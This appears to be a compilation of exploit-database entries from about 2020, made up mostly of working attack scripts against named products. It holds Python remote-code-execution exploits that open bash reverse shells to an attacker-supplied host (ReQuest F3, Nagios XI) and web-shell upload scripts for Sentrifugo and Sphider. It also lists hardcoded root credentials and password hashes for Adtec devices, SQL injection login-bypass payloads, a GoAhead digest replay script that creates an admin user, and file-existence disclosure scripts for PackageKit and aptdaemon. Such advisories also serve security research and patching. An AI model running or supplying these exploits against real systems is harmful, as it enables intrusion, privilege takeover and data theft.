# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated) # Exploit Author: LiquidWorm # Software Link: http://request.com/ # Version: 3.0.0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution # # # Vendor: ReQuest Serious Play LLC # Product web page: http://www.request.com # Affected version: 7.0.3.4968 (Pro) # 7.0.2.4954 # 6.5.2.4954 # 6.4.2.4681 # 6.3.2.4203 # 2.0.1.823 # # Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers # into a compact powerhouse. With the ability to add unlimited NAS devices, the # F3 can handle your entire family's media collection with ease. # # Desc: The ReQuest ARQ F3 web server suffers from an unauthenticated remote # code execution vulnerability. Abusing the hidden ReQuest Internal Utilities # page (/tools) from the services provided, an attacker can exploit the Quick # File Uploader (/tools/upload.html) page and upload PHP executable files that # results in remote code execution as the web server user. # # ============================================================================= # lqwrm@metalgear:~/prive$ python3 ReQuest.py 192.168.1.17:3664 192.168.1.22 6161 # Let's see waddup... # Good to go. # Starting handler on port 6161. # Writing callback file... # We got the dir: /75302IV29ZS1 # Checking write status... # All is well John Spartan. Calling your listener... # Connection from 192.168.0.17:42057 # You got shell. # id;uname -ro # uid=81(apache) gid=81(apache) groups=81(apache),666(arq) # 3.2.0-4-686-pae GNU/Linux # exit # *** Connection closed by remote host *** # lqwrm@metalgear:~/prive$ # ============================================================================= # # Tested on: ReQuest Serious Play® OS v7.0.1 # ReQuest Serious Play® OS v6.0.0 # Debian GNU/Linux 5.0 # Linux 3.2.0-4-686-pae # Linux 2.6.36-request+lenny.5 # Apache/2.2.22 # Apache/2.2.9 # PHP/5.4.45 # PHP/5.2.6-1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2020-5602 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php # # # 01.08.2020 # from time import sleep import threading###### import telnetlib###### import requests####### import socket######### import sys############ import re############# class Manhattan: def __init__(self): self.secretagent = "Mushu" self.payload = None self.deploy = None self.rhost = None self.lhost = None self.lport = None def the_args(self): if len(sys.argv) != 4: self.the_usage() else: self.rhost = sys.argv[1] self.lhost = sys.argv[2] self.lport = int(sys.argv[3]) if not "http" in self.rhost: self.rhost = "http://{}".format(self.rhost) def the_usage(self): self.the_wha() print("Usage: python3 {} [targetIP:targetPORT] [localIP] [localPORT]".format(sys.argv[0])) print("Example: python3 {} 192.168.0.91:3664 192.168.0.22 6161\n".format(sys.argv[0])) exit(0) def the_wha(self): titl = "ReQuest Serious Play F3 Media Server RCE" print(titl) def the_check(self): print("Let's see waddup...") try: r = requests.get(self.rhost + "/MP3/") if "000000000000" in r.text: print("Good to go.") else: print("Something's fishy.") exit(-16) except Exception as e: print("Hmmm {msg}".format(msg=e)) exit(-1) def the_upload(self): print("Writing callback file...") self.headers = {"Cache-Control" : "max-age=0", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarylGyylNPXG5WMGCqP", "User-Agent": self.secretagent, "Accept" : "*/*", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/" + self.lhost+ "/" +str(self.lport) + " <&1;rm bd0.php'\");" self.deploy = "------WebKitFormBoundarylGyylNPXG5WMGCqP\r\n"######## self.deploy += "Content-Disposition: form-data; name=\"uploa" # self.deploy += "dedfile\"; filename=\"bd0.php\"\r\nContent-T" # self.deploy += "ype: application/octet-stream\r\n\r\n" + self.payload self.deploy += "\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP\r\nConte" self.deploy += "nt-Disposition: form-data; name=\"location\"\r\n\r\nm" self.deploy += "p3\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP--\r\n" requests.post(self.rhost+"/shared/upload.php", headers=self.headers, data=self.deploy) sleep(1) r = requests.get(self.rhost + "/MP3/") regex = re.findall(r'a\shref=\"(.*)\/\">', r.text)[2] print("We got the dir: /" + regex) print("Checking write status...") r = requests.get(self.rhost + "/MP3/" + regex) if "bd0" in r.text: print("All is well John Spartan. Calling your listener...") else: print("Something...isn't right.") exit(-16) requests.get(self.rhost + "/MP3/"+ regex + "/bd0.php") def the_subp(self): konac = threading.Thread(name="ZSL", target=self.the_ear) konac.start() sleep(1) self.the_upload() def the_ear(self): telnetus = telnetlib.Telnet() print("Starting handler on port {}.".format(self.lport)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", self.lport)) while True: try: s.settimeout(7) s.listen(1) conn, addr = s.accept() print("Connection from {}:{}".format(addr[0], addr[1])) telnetus.sock = conn except socket.timeout as p: print("Hmmm ({msg})".format(msg=p)) s.close() exit(0) break print("You got shell.") telnetus.interact() conn.close() def main(self): self.the_args() self.the_check() self.the_subp() if __name__ == '__main__': Manhattan().main()

# Exploit Title: Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root # Date: 2020-07-24 # Exploit Author: LiquidWorm # Software Link: https://www.adtecdigital.com / https://www.adtecdigital.com/support/documents-downloads # Version: Multiple Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root Vendor: Adtec Digital, Inc. Product web page: https://www.adtecdigital.com https://www.adtecdigital.com/support/documents-downloads Affected version: SignEdje Digital Signage Player v2.08.28 mediaHUB HD-Pro High & Standard Definition MPEG2 Encoder v3.07.19 afiniti Multi-Carrier Platform v1905_11 EN-31 Dual Channel DSNG Encoder / Modulator v2.01.15 EN-210 Multi-CODEC 10-bit Encoder / Modulator v3.00.29 EN-200 1080p AVC Low Latency Encoder / Modulator v3.00.29 ED-71 10-bit / 1080p Integrated Receiver Decoder v2.02.24 edje-5110 Standard Definition MPEG2 Encoder v1.02.05 edje-4111 HD Digital Media Player v2.07.09 Soloist HD-Pro Broadcast Decoder v2.07.09 adManage Traffic & Media Management Application v2.5.4 Summary: Adtec Digital is a leading manufacturer of Broadcast, Cable and IPTV products and solutions. Desc: The devices utilizes hard-coded and default credentials within its Linux distribution image for Web/Telnet/SSH access. A remote attacker could exploit this vulnerability by logging in using the default credentials for accessing the web interface or gain shell access as root. Tested on: GNU/Linux 4.1.8 (armv7l) GNU/Linux 3.12.38 (PowerPC) GNU/Linux 2.6.14 (PowerPC) Adtec Embedded Linux 0.9 (fido) Apache Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5603 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php 24.07.2020 -- Creds: ------ adtec:none:500:1000:adtec:/media:/bin/sh admin:1admin!:502:502:admin:/home/admin:/bin/sh root1:1root!:0:0:root:/root:/bin/sh adtecftp:adtecftp2231 SSH: ---- login as: root [email protected]'s password: Successfully logged in. Thank you for choosing Adtec Digital products- we know you had a choice and we appreciate your decision! root@targethostname:~# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -- admin@targethostname:/$ id uid=502(admin) gid=502(admin) groups=0(root),502(admin) admin@targethostname:~$ id adtec uid=500(adtec) gid=1000(users) groups=1000(users),72(apache) admin@targethostname:~$ cat /etc/sudoers |grep -v "#" root ALL=(ALL) ALL apache ALL=(ALL) NOPASSWD: ALL Telnet (API): ------------- Adtec Resident Telnet Server... UserName: adtec adtec PassWord: none User adtec connected *.SYSD SHELLCMD cat /etc/passwd *.SYSD CMD cat /etc/passwd OK root:he7TRuXjJjxfc:0:0:root:/root:/bin/sh adtec:GC1BpYa80PaoY:500:1000:adtec:/media:/bin/sh apache:!!:72:72:Apache Server:/dev/null:/sbin/nologin fregd:!!:73:73:Freg Daemon:/dev/null:/sbin/nologin ntp:!!:38:38:NTP Server:/dev/null:/sbin/nologin syslogd:!!:74:74:Syslog Daemon:/dev/null:/sbin/nologin admin:rDglOB38TVYRg:502:502:admin:/home/admin:/bin/sh sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false avahi:x:82:82:Avahi Daemon:/dev/null/:/sbin/nologin avahi-autoipd:x:83:83:Avahi Autoipd:/dev/null/:/sbin/nologin messagebus:x:81:81:Message Bus Daemon:/dev/null:/sbin/nologin ... ...

# Exploit Title: TDM Digital Signage PC Player 4.1 - Insecure File Permissions # Date: 2020-09-23 # Exploit Author: LiquidWorm # Software Link: https://www.tdmsignage.com / https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y # Version: 4.1.0.4 Vendor: TDM [Trending Digital Marketing] Product web page: https://www.tdmsignage.com https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y Affected version: 4.1.0.4 Summary: With TDM you can do a lot more than just show Digital Signage. With our Enterprise-Grade software you open the door to Interactive Signage, Analytics, Proof of Play and a lot more. Desc: TDM Digital Signage Windows Player suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group. Tested on: Microsoft Windows 10 Home Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5604 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php 23.09.2020 -- C:\>icacls TDMSignage TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) NT AUTHORITY\Authenticated Users:(I)(M) <---------<<< NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) <---------<<< Successfully processed 1 files; Failed processing 0 files C:\TDMSignage>dir /b *.exe Player.exe unins000.exe C:\TDMSignage>icacls Player.exe && icacls unins000.exe Player.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) <---------<<< Successfully processed 1 files; Failed processing 0 files unins000.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) <---------<<< Successfully processed 1 files; Failed processing 0 files

# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated) # Date: 26/10/2020 # Exploit Author: Gurkirat Singh <[email protected]> # Vendor Homepage: http://www.sentrifugo.com/ # POC Link: https://www.exploit-db.com/exploits/47323 # Version: 3.2 # Tested on: Linux and Windows # CVE : CVE-2019-15813 # Contact Details: https://google.com/search?q=tbhaxor from argparse import ArgumentParser, RawTextHelpFormatter from bs4 import BeautifulSoup, Tag from requests.sessions import Session import tempfile as tmp import os.path as path import random import string from huepy import * parser = ArgumentParser(description="Exploit for CVE-2019-15813", formatter_class=RawTextHelpFormatter) parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t") parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u") parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p") args = parser.parse_args() if args.t.endswith("/"): args.t = args.t[:-1] F = "".join(random.choices(string.ascii_letters, k=13)) + ".php" with Session() as http: print(run("Logging in")) data = {"username": args.u, "password": args.p} r = http.post(args.t + "/index.php/index/loginpopupsave", data=data, allow_redirects=False) if not (r.headers.get("Location", "").endswith("welcome") or r.headers.get("Location", "").endswith("welcome/")): print(bad("Unable to login. Check username / password")) exit(1) print(good("Logged in")) print(run("Exploiting")) files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")} r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files) if r.status_code != 200: print(bad("Unable to upload file")) exit(1) file_name = r.json()["filedata"]["new_name"] print(info("Spawning shell")) user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "whoami"}) host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "cat /etc/hostname"}) shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}" while True: try: cmd = input(shell) if cmd == "exit": break r = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": cmd}) print(r.content.decode().strip()) except Exception as e: print() break print(run("Cleaning")) http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "rm %s" % file_name}) r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name) if r.status_code == 404: print(good("Cleaned")) else: print(bad("Unable to clean the file"))

# Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection # Date: 26/10/2020 # Exploit Author: Serkan Sancar # Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841 # Version: 1.0 # Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3 Step 1: Open the URL http://localhost/clientms/client/index.php Step 2: Login to client user on panel Step 3: use check sql injection payload 1' or 1=1# in searchbox field Malicious Request on burp suite POST /clientms/client/search-invoices.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/clientms/client/search-invoices.php Content-Type: application/x-www-form-urlencoded Content-Length: 210 Origin: http://localhost Connection: close Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453 Upgrade-Insecure-Requests: 1 searchdata=1%27+or+1%3D1%23&search= Step 4: You will list all invoices and you will had checked sql injection on The Panel. Example other method: you saved to inspected package on burp suite. you can exploitation more easily with use sqlmap -r parameter. sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs

# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated) # Google Dork: intitle:"Sphider Admin Login" # Date: 2014-07-28 # Exploit Author: Gurkirat Singh # Vendor Homepage: http://www.sphider.eu/ # Software Link: http://www.sphider.eu/sphider-1.3.6.zip # Version: v1.3.6 # Tested on: Windows and Linux # CVE : CVE-2014-5194 # Proof of Concept: https://www.exploit-db.com/exploits/34189 from argparse import ArgumentParser, RawTextHelpFormatter from huepy import * import string import random from bs4 import BeautifulSoup, Tag from requests import Session from randua import generate as randua _F = "".join(random.choices(string.ascii_letters, k=13)) parser = ArgumentParser(description="Exploit for CVE-2014-5194", formatter_class=RawTextHelpFormatter) parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t") parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u") parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p") parser.add_argument("--debug", help="if passed, spawn the firefox window", default=True, action="store_false") parser.add_argument("--timeout", help="timeout in seconds (default: 1)", dest="T", metavar="", default=1) args = parser.parse_args() if args.t.endswith("/"): args.t = args.t[:-1] print(run("Logging in")) with Session() as http: data = {"user": args.u, "pass": args.p} headers = {"User-Agent": randua()} http.post(args.t + '/admin/auth.php', data=data, headers=headers, allow_redirects=False) r = http.get(args.t + '/admin/admin.php', headers=headers, allow_redirects=False) html = BeautifulSoup(r.content.decode(), "lxml") title: Tag = html.find("title") if title.text == "Sphider Admin Login": print(bad("Failed to login")) exit(1) else: print(good("Logged in")) payload = { 'f': 'settings', 'Submit': '1', '_version_nr': '1.3.5', '_language': 'en', '_template': 'standard', '_admin_email': 'admin@localhost', '_print_results': '1', '_tmp_dir': 'tmp', '_log_dir': 'log', '_log_format': 'html', '_min_words_per_page': '10', '_min_word_length': '3', '_word_upper_bound': '100;system($_POST[cmd])', '_index_numbers': '1', '_index_meta_keywords': '1', '_pdftotext_path': 'c:\\temp\\pdftotext.exe', '_catdoc_path': 'c:\\temp\\catdoc.exe', '_xls2csv_path': 'c:\\temp\\xls2csv', '_catppt_path': 'c:\\temp\\catppt', '_user_agent': 'Sphider', '_min_delay': '0', '_strip_sessids': '1', '_results_per_page': '10', '_cat_columns': '2', '_bound_search_result': '0', '_length_of_link_desc': '0', '_links_to_next': '9', '_show_meta_description': '1', '_show_query_scores': '1', '_show_categories': '1', '_desc_length': '250', '_did_you_mean_enabled': '1', '_suggest_enabled': '1', '_suggest_history': '1', '_suggest_rows': '10', '_title_weight': '20', '_domain_weight': '60', '_path_weight': '10', '_meta_weight': '5' } print(run("Exploiting")) http.post(args.t + "/admin/admin.php", data=payload) r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F}) if r.content.decode().strip() != _F: print(bad("Failed")) exit(1) print(good("Exploited")) print(info("Spawning Shell")) user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"}) host = http.post(args.t + "/settings/conf.php", data={"cmd": "cat /etc/hostname"}) shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}" while True: try: cmd = input(shell) if cmd == "exit": break r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd}) print(r.content.decode().strip()) except: break print()

# Exploit Title: GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse # Date: 2019-08-29 # Exploit Author: LiquidWorm # Software Link: https://www.embedthis.com # Version: 5.1.1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse # # # Vendor: Embedthis Software LLC # Product web page: https://www.embedthis.com # Affected version: <=5.1.1 and <=4.1.2 # Fixed version: >=5.1.2 and >=4.1.3 # # Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact, # secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is # ideal for the smallest of embedded devices. # # Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when # using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web # server does not completely protect against replay attacks. This allows an unauthenticated # remote attacker to bypass authentication via capture-replay if TLS is not used to protect # the underlying communication channel. Digest authentication uses a "nonce" value to mitigate # replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes # which permitted short-period replays. This duration is too long for most implementations. # # Tested on: GoAhead-http # GoAhead-Webs # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5598 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php # # CVE ID: CVE-2020-15688 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688 # https://nvd.nist.gov/vuln/detail/CVE-2020-15688 # # CWE ID: CWE-294 Authentication Bypass by Capture-replay # CWE URL: https://cwe.mitre.org/data/definitions/294.html # # CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption # CWE URL: https://cwe.mitre.org/data/definitions/323.html # # GoAhead Security Alerts / Fix: # https://github.com/embedthis/goahead-gpl/issues/3 # https://github.com/embedthis/goahead-gpl/issues/2 # https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2 # # # 29.08.2019 # # # PoC for a network controller running GoAhead web server. # Replay Authentication Bypass / Create Admin User # import requests import sys##### if (len(sys.argv) <= 1): print("Usage: ./nen.py <ipaddress>") exit(0) ip = sys.argv[1] url = "http://"+ip+"/goform/formUserManagementAdd?lang=en" kolache = {"lang":"en"} replay = "Digest username=\"admin\", " replay += "realm=\"GoAhead\", " replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", " replay += "uri=\"/goform/formUserManagementAdd?lang=en\", " replay += "algorithm=MD5, " replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", " replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", " replay += "qop=auth, " replay += "nc=0000000a, " replay += "cnonce=\"0649f631320f23bb\"" headers = {"Cache-Control": "max-age=0", "Authorization": replay, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "NoProxy/NoProblem.251", "Accept-Encoding": "gzip, deflate", "Accept-Language": "mk-MK;q=0.9,mk;q=0.8", "Connection": "close"} data = {"FormSubmitCause": "button", "DefinitionAction": "add", "Define_admin_ID": "admin", "Define_admin_Name": "admin", "Define________Action________ID": '', "Define________Action________Name": "testingus", "Define________Action________Password": "testingus", "Define________Action________Group": "Administrators"} requests.post(url, headers=headers, cookies=kolache, data=data) print("Finito")

# Exploit Title: CSE Bookstore Authentication Bypass # Date: 27/10/2020 # Exploit Author: Alper Basaran # Vendor Homepage: https://projectworlds.in/ # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip # Version: 1.0 # Tested on: Windows 10 Enterprise 1909 CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel. By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability. Payload: Name: admin Pass: %' or '1'='1 Sample BurpSuite intercept: POST /bookstore/admin_verify.php HTTP/1.1 Host: 192.168.20.131 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 60 Origin: http://192.168.20.131 Connection: close Referer: http://192.168.20.131/bookstore/admin.php Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv Upgrade-Insecure-Requests: 1 name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query

# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated) # Date: 10-27-2020 # Vulnerability Discovery: Chris Lyne # Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.3 # Tested on: Ubuntu 20.04 # CVE: CVE-2020-5791 #!/usr/bin/python3 import re import requests import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Credit: Chris Lyne for vulnerability discovery and original PoC if len(sys.argv) != 6: print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port") exit() host = sys.argv[1] username = sys.argv[2] password = sys.argv[3] attacker_ip = sys.argv[4] attacker_port = sys.argv[5] login_url = host + "/nagiosxi/login.php" payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port) encoded_payload = urllib.parse.quote_plus(payload) def exploit(): s = requests.Session() login_page = s.get(login_url) nsp = re.findall('var nsp_str = "(.*?)"', login_page.text) res = s.post( login_url, data={ 'nsp': nsp, 'page': 'auth', 'debug': '', 'pageopt': 'login', 'redirect': '/nagiosxi/index.php?', 'username': username, 'password': password, 'loginButton': '' }, verify=False, allow_redirects=True ) injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload) res = s.get(injection_url) if res.status_code != 200: print("[~] Failed to connect") if __name__ == '__main__': exploit()

# Exploit Title: File Existence Disclosure in PackageKit < 1.1.13-2ubuntu1 # Date: 2020-10-27 # Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl) # Vendor Homepage: https://www.freedesktop.org/software/PackageKit/ # Software Link: https://www.freedesktop.org/software/PackageKit/ # Version: <= 1.1.1+bzr982-0ubuntu32.1 # Tested on: Ubuntu 20.04 # #!/usr/bin/env python3 # # Ubuntu 16.04 - 20.04 # PackageKit <= 1.1.13-2ubuntu1 # Sensitive Information Disclosure # # # Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html # # The InstallFiles, GetFilesLocal and GetDetailsLocal methods # of the d-bus interface to PackageKit accesses given files # before checking for authorization. This allows non-privileged # users to learn the MIME type of any file on the system. # # Example in attached Python script: # # $ python3 test_file_exists_pk.py /root/.bashrc # File exists and is of MIME type: 'text/plain' # # $ python3 test_file_exists_pk.py /root/.bashrca # File does not exist # # import dbus import os import sys import re if len(sys.argv) != 2: print("Checks if file exists and returns MIME type") print("Usage: %s <file>") sys.exit(0) FILE_TO_CHECK = sys.argv[1] bus = dbus.SystemBus() apt_dbus_object = bus.get_object("org.freedesktop.PackageKit", "/org/freedesktop/PackageKit") apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.freedesktop.PackageKit") trans = apt_dbus_interface.CreateTransaction() apt_trans_dbus_object = bus.get_object("org.freedesktop.PackageKit", trans) apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.freedesktop.PackageKit.Transaction") try: apt_trans_dbus_interface.InstallFiles(0, [FILE_TO_CHECK]) # ALSO apt_trans_dbus_interface.GetFilesLocal([FILE_TO_CHECK]) # ALSO apt_trans_dbus_interface.GetDetailsLocal([FILE_TO_CHECK]) except dbus.exceptions.DBusException as e: if "No such file" in str(e): print("File does not exist") elif "MimeTypeNotSupported" in str(e): result = re.search('MIME type (.*) not supported', str(e)) print("File exists and is of MIME type: " + result.group(1))

# Exploit Title: File Existence Disclosure in aptdaemon <= 1.1.1+bzr982-0ubuntu32.1 # Date: 2020-10-27 # Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl) # Vendor Homepage: https://wiki.debian.org/aptdaemon # Software Link: https://wiki.debian.org/aptdaemon # Version: <= 1.1.1+bzr982-0ubuntu32.1 # Tested on: Ubuntu 20.04 # #!/usr/bin/env python3 # # Ubuntu 16.04 - 20.04 # Debian 9 - 11 # aptdaemon < 1.1.1+bzr982-0ubuntu32.1 # Sensitive Information Disclosure # # Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html # # There is no input validation on the Locale property in an # apt transaction. An unprivileged user can supply a full path # to a writable directory, which lets aptd read a file as root. # Having a symlink in place results in an error message if the # file exists, and no error otherwise. This way an unprivileged # user can check for the existence of any files on the system # as root. # # This is a similar type of bug as CVE-2015-1323. # # # $ ./test_file_exists.py /root/.bashrc # File Exists! # $ ./test_file_exists.py /root/.bashrca # File does not exist! # # import dbus import os import sys if len(sys.argv) != 2: print("Checks if file exists") print("Usage: %s <file>") sys.exit(0) FILE_TO_CHECK = sys.argv[1] bus = dbus.SystemBus() apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt") apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt") # just use any valid .deb file trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb", False) apt_trans_dbus_object = bus.get_object("org.debian.apt", trans) apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction") properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties') os.mkdir("/tmp/a") os.mkdir("/tmp/a/LC_MESSAGES") os.symlink(FILE_TO_CHECK, "/tmp/a/LC_MESSAGES/aptdaemon.mo") try: properties_manager.Set("org.debian.apt.transaction", "Locale", "/tmp/a.") except: print("File Exists!") pass else: print("File does not exist!") os.unlink("/tmp/a/LC_MESSAGES/aptdaemon.mo") os.rmdir("/tmp/a/LC_MESSAGES") os.rmdir("/tmp/a")